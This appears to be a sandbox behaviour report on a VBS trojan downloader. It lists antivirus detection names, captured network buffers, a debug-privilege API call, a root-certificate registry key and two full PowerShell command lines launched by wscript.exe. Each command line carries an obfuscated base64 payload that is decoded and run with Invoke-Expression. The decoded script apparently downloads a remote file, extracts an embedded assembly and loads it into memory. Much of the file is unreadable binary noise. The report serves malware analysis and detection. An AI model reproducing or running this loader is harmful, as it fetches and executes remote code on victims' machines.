ÉùÎ%›|w«Jýè›å¶»U]¥Î"Ç\™YÀ"ºÎ@€ˆk“d¸LÔÎ÷ÿR6q§ÿÖMVºÕה€Òmÿ…ϝòd,<ÞûdcGÇwž‡ú7ý£P¦§¿Ñ$8º‡xš‘šÐçê77xÄþ*CêCà“ Ýdtï4ž\;©䤢‹á[ ¬³N>“L–n&H²Š^@Ê1ªóϸ=Üï¤'$‹Jî¸ûÈÙ¿´‡VJ™CS’üç•U 5˜´—rˆsL„'˜pÍ+tñLþFŠæÓ¥±½í&0kÀþ»AÚgŒOM§_  /çmß-ÚÌ쇄h‹H†ºE2 З¨•†Š¦º§œªÒQy´Ô×?A<îá¹[°N•ZŠÐ&?£3¡þÿ†Sš¼p…Qt¹ øsjF0‡Òw‚¶Ø¨ŠpžS8Ou¦ GÜ©9=-“›iÑaÜý·;Rٕ‹k‡T3zbZüÓTÀÌ$ß9o™øÞ(Ðól›O|C†“¤#Ð1X§ªåFG¤ˆTÙ»ãÏd3àL>^f‹ä®<,ìÒ0ù™DÎáI0õuHŠ»åêʨˆ†w’ƒÜj¯hYE@K{aw=ìχP!T:™G ^BOòŒÀTGs**Ù¿c]x¥&œ¹¨=ÊÖ()Ú̙&Ú?hÍÓ¸“#ÃæþN81€ÿ|ßR\{@0žÁÍ:,¯¢U׸ûƒÏÄØ:ï¼ÐºeæK  iå¢bÖïC·ä¼â÷¥´!ϕ ã[çå wN7–g¸š·í7=‘{øBö‰#Yù²p‹ç!²jÌ¡gÍ¾m×mrTDIý}0ÊxƒêµÉvµô)z‘Õ®Î4~\fÏËø.§¬Í]žJˆôW§Á wöÌêqxËÌ'Ł9»8îáºt: ¢&Zÿ“wdócŸ¹ä)ÓL; )â5;r‚ñÌ¥Š©òŒŠ[ïiõðÊ;XWªy™î ¦®"φ€Äb]ۥݙàÅ׸òãJ‡‰þdÀ?Oð/a$iÞ5Ù-ärÏtɐ@ªÁ#ö“Î#eŽxR"n‡8×èbì€Iª úéñ7Žm z¦’%8‚##$ˆ ˆXã|^-]˜¥P<%²Æ¹èŸsâq‚P'‚ÑÏԜ*â=‰ÕE ežS¯¯E®‰”8A'…¦n%º^šËØ´¦.ç÷02âÙÜUî0iH–h»æ`g}ZŠþwuç^AsiÑ5ˆ­²áí{fgŒ»MºÒÅå;§Èž¯xk܋ëñ‰”íÛÕøÏÜ¢jh¼9öõ⬆’¿íwÍÐ ü,gدÍÁïþ†ô|VN GœqnU¤ùœ\Ý0¤¾V:rš%d¨Ø¡qŒYã®VTD ò)ëênÈhq±¨h²ãs@I–¾-?rÌ£‘Õ18d÷ˆ‚ÃëÓî¨ÂðY]ùÒFƍÚ%[–)Г %¶¥o>0 BŠé¹ØÔ£|k›GûùõP÷†úð/õÁõ³ÿ@R½Ipƒ90¢[ïœ2B‡°›h¦1÷k¦`eš¨íS†(6à û¼¥ ™k¤TWpd-³O £zÆüÕx7hÉó›Õ\€Täå¬ÝÇ"Á[lÁ,óÑ£µÁ¨„”n=šhvªÉ踇GOü­VÀ°“¥{=k
Data received °³ž}¸ÿxW“t»džŒÚÿâR:¤Dõò=eP
Data received róm=-U m¼âœ\Ðm ÿÊ|”êØ@ŨŸ¢
Data received —;)£aÙ­ôRçì3ÍÞ<ú®ÄS"¡W8Ñ.Fîƒ
Data received Í»©»hSŒ(^ܪ§R(Óå˄÷ÉžX‰`Y4ê
Data received \Ɂ‘².·YK€ñ¤DPG«osÓAT‚¿
Data received ¿â‹-ÅÜÖIéÒß1嫎c«KÄòà­vpH
Data received '+ºZ2ŠÝrŠÌop×'w£¿ 2¹l™8&ƒ½ îBÜmîg{PâpÚ¬Ú½ÁhK¶-x…@ ¤HÛ{ñ)£yû°b2ŠÅJ´J¥˜ Ž«oi›¹àìL§OX2ÎírÕ²Ë oÙÅÞM÷®]­}Nœý oÆ1-—†ö7ô“$Q4hGŒVh¶â &•u¦ôÎI즛ӊjDð¢ý—øÜ„¯y˜&oƌ'eC(›œÖÉk…õà ü+л<…)à–O¾#kÕst":ÔGܯ†^¾1¡<ulvۃÎ"òIXp;š”¼8¤ù]ûg_=чú^Xvd Šø‘ò… äbºæäšV~]’«՗ì:SÓւBòyøužã&ZýUôëÐ4º³Ë …&ú&Ð4nO#ô ֖ÇS+¾c”Aç“Q{ʼMXMGv˜êjÅsÿzp(††4…´É¹¼À·M¨êÞÖæ<j&SÁ£ÄŸl B£P¨ÖY|uE•‰±ŽÇˆÜ#ô¦{I…(k'וÚòIc=#*ú1|J¿]•à²çò(ÀÂoY£e›Xï­Í’ÿs6°Âr¨B†¶3÷ ú'‹©› æãhÐÕ1/YÝnñlÒº;o5)gò_]¸}—Kԟû‚š|UKùK§áP'÷b\‘ݲ':¸‹»s>Ì£¹‘”ÙKÌøš&}Ѭ¤÷Š«V@üdY0k/Äًfˆ>fYªx“¡:‰'Ñc‚qž‡ijPÂü¶xzê=¬ß’‹üÀÁ’ìHàòÙó£³rö؎1ÄJXÓcÃD2¬d©4¨«‰Ræ+Û²R0/CfÒûjãhn+þВkœ=ù]킊1ƒPôœÆ³[ÊÉӉ.›m*ß3£‘p†:_ûc@ ©HʺI0¸&s²oûچžN ; V›5ª,²Ç¹kgò6þÏGúÀyžsÆl¾ßÂfaù{ø¸^®f2sácêhÓx®¾š›Î0Øø­Ô홬ò·ö=;Ù{äˆf[(ø:ҵ͎÷“6'GÌÈ&ÐÕj2¥Ì©Jže ’ GL”©Ó+vwW*@íäë§Pìu‡ ‡þïß|pŽÐ¼2NÞ!;9®Zö%}†½NÈL+£ƒ!g‘›±~ _Óz™ v£8C‡êKnZ£4»yfÀBªñƒé5½ÚÀÆ­$üÉWë£# s2ÿ+ÿ×ˆ3ŸãøºKK[C¥¼¸¿.PP-tOv÷Y†Êïu`SùKÒÏo'¼}†Ð ƐRè®þ´>"/ÉcqsûƒdÜvn*½ji¢³íäo]<.¬ø„‘4LÄóÊÊᣇ„›ñs|IÛ¬#͸ILj㚌£€Þ¼qk/ã¹ Ç·ÔO̯°â<-'[ÕÞUfÖH¶º[&oÉd¶œÞ‘úa.vÿº¥·pÛêÉJÿ‹¡Ö˜G2NêÁ´ŽäþŽLvå³â5½y„³¶Aî8BN ‚_F<!ˊæ´É<[ƒÿ MÅAœzƒÐ}; ê\D¢&ù³OÁ“!|OhH”ôfŔ>ý…š¸,òlðËRÙ³<§q ^®sdÃw;M!ÑYI µ€{^J6¤ÉHã² éӐË£ñKúºÐCÙtLd/ŒÛS§¹'ÞĨ°žûæC§ì¥à<dН1;¨¦²nf· t™¬Ë#äöÙѵ«ÕÜÁT—€ës·ªP[¸çâÍS‡ªU(lÀy‘nër‚h „+}Ä#« v\d ÄY´üº´9RH+*ü‡õ¶U± œŒ»sy& ùΒo…Í<‰w§auJú…$&òr53®u%ЁÔ–y4û~ý!þ1g£^|çÈP¬g”£°T14îFdn5­“›8ºèbUjû€ÌŸè p(û)þg‹=jSËÍYµ)F ÜÙ jĀAámŒkA¼áä÷о¸øŽ¿tÿdkŸü/¬P )|M+ÐqW†š_úþu·_…Lí*LJR˜¤h bšF +M]fÜù°Ú/4'²}ÆŒAÆh߂áÙWÿD°ƒn]͒D˜LµtCvšL Ê%ì@‡šq«ãa“€åӝ>ýÀTD˜¬¨þÛy‰]ZÆk^‹Q„Ûۊƒ¯ÕH. ²ÿhlU£o^Ph/§â*GbðÚhs ·½û¹+HìÁ §k^Ÿ¶F™ÆY¯îØ~òÙr\
Data received j+®‡$Yš~9Ø>ÑQcž§tÐúŒƒ>„ œâ²»ÛLÍ
Data sent tpgÅAºk#c.–g;nç%tW˜ "B PB‹ÖW.1/5 ÀÀÀ À 28/ÿ1007.filemail.com  
Data sent FBA‡SþùDÓƒm¦¹y3»ëß/“Ì)ö ;*΁7oǬ¼€ÛQâ!«Zü¯çHä¼kœí¯Í—]–Q €8µ0|\àMñ*hˆ£öìЯ®òJL:Ùk&]ö$Õ·!.ÚÈ‘ÃXXmÀ'•Åæ
Data sent àÄH€¶›Éμ%~uâÎJÀ=°~Js¶\øL{¨³m÷‘Xµ"=‚þ]º[ÎÆrÎ:KÅ*k¼ØV|à^xØ)‹ÀKóîe€%(Yœ\Y-ž˜|C“‘²›–<råXÿíñâf·{¬ñ³#˜©ò£9¿¸·ŽÆ§ÉÖ®”‰ –©Ô[|{µ§9ƒÌ‰—QüA ÷Ær\ªÌ­“RÒħ|ü¯Ûgú£zÉQ•/·Aôí³ç|IéÅì¾ÂZΊ0 Øl@ aÚËÞ%„4yƗ Fò¶cœÄû݆ij®jÿ
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Skyhigh BehavesLike.VBS.Dropper.cp
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan.Script.Generic
Ikarus Trojan-Downloader.VBS.Agent
Google Detected
Kingsoft Script.Trojan.Generic.a
Microsoft Trojan:Script/Wacatac.B!ml
GData Script.Trojan.Agent.E1C3DC
huorong HEUR:TrojanDownloader/VBS.Agent.r
Fortinet VBS/Agent.ABPS!tr
AVG Script:SNH-gen [Trj]
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: tpgÅAºk#c.–g;nç%tW˜ "B PB‹ÖW.1/5 ÀÀÀ À 28/ÿ1007.filemail.com  
socket: 1420
sent: 121
1 121 0

send

buffer: FBA‡SþùDÓƒm¦¹y3»ëß/“Ì)ö ;*΁7oǬ¼€ÛQâ!«Zü¯çHä¼kœí¯Í—]–Q €8µ0|\àMñ*hˆ£öìЯ®òJL:Ùk&]ö$Õ·!.ÚÈ‘ÃXXmÀ'•Åæ
socket: 1420
sent: 134
1 134 0

send

buffer: àÄH€¶›Éμ%~uâÎJÀ=°~Js¶\øL{¨³m÷‘Xµ"=‚þ]º[ÎÆrÎ:KÅ*k¼ØV|à^xØ)‹ÀKóîe€%(Yœ\Y-ž˜|C“‘²›–<råXÿíñâf·{¬ñ³#˜©ò£9¿¸·ŽÆ§ÉÖ®”‰ –©Ô[|{µ§9ƒÌ‰—QüA ÷Ær\ªÌ­“RÒħ|ü¯Ûgú£zÉQ•/·Aôí³ç|IéÅì¾ÂZΊ0 Øl@ aÚËÞ%„4yƗ Fò¶cœÄû݆ij®jÿ
socket: 1420
sent: 229
1 229 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
parent_process wscript.exe martian_process powershell -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
option -noprofile value Does not load current user profile
option -noprofile value Does not load current user profile
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe